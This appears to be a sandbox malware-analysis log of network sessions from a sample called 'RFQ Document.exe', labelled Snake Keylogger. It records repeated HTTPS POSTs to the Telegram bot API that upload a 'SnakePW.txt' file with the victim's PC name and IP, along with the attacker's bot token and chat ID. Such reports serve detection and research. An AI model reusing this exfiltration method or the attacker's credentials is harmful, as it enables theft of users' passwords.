                                            2021-09-28 05:59:16 UTC323OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 31 61 36 34 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e31a64b4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:16 UTC324INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:16 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:16 UTC324INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 32 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12792,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808756,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            203192.168.2.450024149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:16 UTC324OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e3323cac
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:16 UTC325OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 33 32 33 63 61 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e3323cacContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:16 UTC325INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:16 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:16 UTC326INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 33 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12793,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808756,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            204192.168.2.450025149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:16 UTC326OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e3513bb4
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:16 UTC326OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 35 31 33 62 62 34 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e3513bb4Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:16 UTC327INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:16 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:16 UTC327INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 34 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 36 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12794,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808756,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            205192.168.2.450026149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:17 UTC328OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e366b155
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:17 UTC328OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 36 36 62 31 35 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e366b155Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:17 UTC328INHTTP/1.1 200 OK
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:17 GMT
                                            Content-Type: application/json
                                            Content-Length: 520
                                            Connection: close
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Allow-Methods: GET, POST, OPTIONS
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:17 UTC329INData Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 31 32 37 39 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 31 39 32 36 35 33 37 33 39 33 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 73 69 72 6d 6f 6d 6f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 31 36 36 34 37 34 38 34 31 31 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 5a 75 62 62 79 22 2c 22 6c 61 73 74 5f 6e 61 6d 65 22 3a 22 7a 75 62 62 79 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 7a 75 62 62 79 7a 75 62 62 79 30 31 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 36 33 32 38 30 38 37 35 37 2c 22 64
                                            Data Ascii: {"ok":true,"result":{"message_id":12795,"from":{"id":1926537393,"is_bot":true,"first_name":"sirmomo","username":"sirmomoBot"},"chat":{"id":1664748411,"first_name":"Zubby","last_name":"zubby","username":"zubbyzubby01","type":"private"},"date":1632808757,"d


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            206192.168.2.450027149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:17 UTC329OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e385affe
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:17 UTC330OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 38 35 61 66 66 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e385affeContent-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:17 UTC330INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:17 GMT
                                            Content-Type: application/json
                                            Content-Length: 109
                                            Connection: close
                                            Retry-After: 9
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:17 UTC330INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            207192.168.2.450028149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:17 UTC330OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e39d86f0
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:17 UTC331OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 39 64 38 36 66 30 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e39d86f0Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:17 UTC331INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:17 GMT
                                            Content-Type: application/json
                                            Content-Length: 109
                                            Connection: close
                                            Retry-After: 9
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:17 UTC332INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            208192.168.2.450029149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:17 UTC332OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e3b2fc82
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:17 UTC332OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 62 32 66 63 38 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e3b2fc82Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:17 UTC332INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:17 GMT
                                            Content-Type: application/json
                                            Content-Length: 109
                                            Connection: close
                                            Retry-After: 9
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:17 UTC333INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            209192.168.2.450030149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:59:17 UTC333OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255e3c3ab75
                                            Host: api.telegram.org
                                            Content-Length: 407
                                            2021-09-28 05:59:17 UTC333OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 39 38 32 35 35 65 33 63 33 61 62 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 6e 61 6b 65 50 57 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 50 57 20 7c 20 6a 6f 6e 65 73 20 7c 20 53 6e 61 6b 65 0d 0a 20 0d 0a 0d 0a 50 43 20 4e 61 6d 65 3a 34 37 33 36 32 37 0d 0a 44 61 74 65 20 61 6e 64 20 54 69 6d 65 3a 20 39 2f 32 38 2f 32 30 32 31 20 2f 20 37 3a 35 38 3a 30 32 20 41 4d 0d 0a 43 6c 69 65 6e 74 20 49 50 3a
                                            Data Ascii: --------------------------8d98255e3c3ab75Content-Disposition: form-data; name="document"; filename="SnakePW.txt"Content-Type: application/x-ms-dos-executablePW | user | Snake PC Name:473627Date and Time: 9/28/2021 / 7:58:02 AMClient IP:
                                            2021-09-28 05:59:17 UTC334INHTTP/1.1 429 Too Many Requests
                                            Server: nginx/1.18.0
                                            Date: Tue, 28 Sep 2021 05:59:17 GMT
                                            Content-Type: application/json
                                            Content-Length: 109
                                            Connection: close
                                            Retry-After: 9
                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                            Access-Control-Allow-Origin: *
                                            Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                            2021-09-28 05:59:17 UTC334INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 32 39 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 6f 6f 20 4d 61 6e 79 20 52 65 71 75 65 73 74 73 3a 20 72 65 74 72 79 20 61 66 74 65 72 20 39 22 2c 22 70 61 72 61 6d 65 74 65 72 73 22 3a 7b 22 72 65 74 72 79 5f 61 66 74 65 72 22 3a 39 7d 7d
                                            Data Ascii: {"ok":false,"error_code":429,"description":"Too Many Requests: retry after 9","parameters":{"retry_after":9}}


                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                            21192.168.2.449795149.154.167.220443C:\Users\user\Desktop\RFQ Document.exe
                                            TimestampkBytes transferredDirectionData
                                            2021-09-28 05:58:24 UTC33OUTPOST /bot1926537393:AAHGSUhtLeQU8qms_2blDH9qpvo-fEuwi9E/sendDocument?chat_id=1664748411&caption=%20Pc%20Name:%20user%20%7C%20Snake%20Keylogger%0D%0A%0D%0APW%20%7C%20user%20%7C%20Snake HTTP/1.1
                                            Content-Type: multipart/form-data; boundary=------------------------8d98255c452b1bf
                                            Host: api.telegram.org
                                            Content-Length: 407
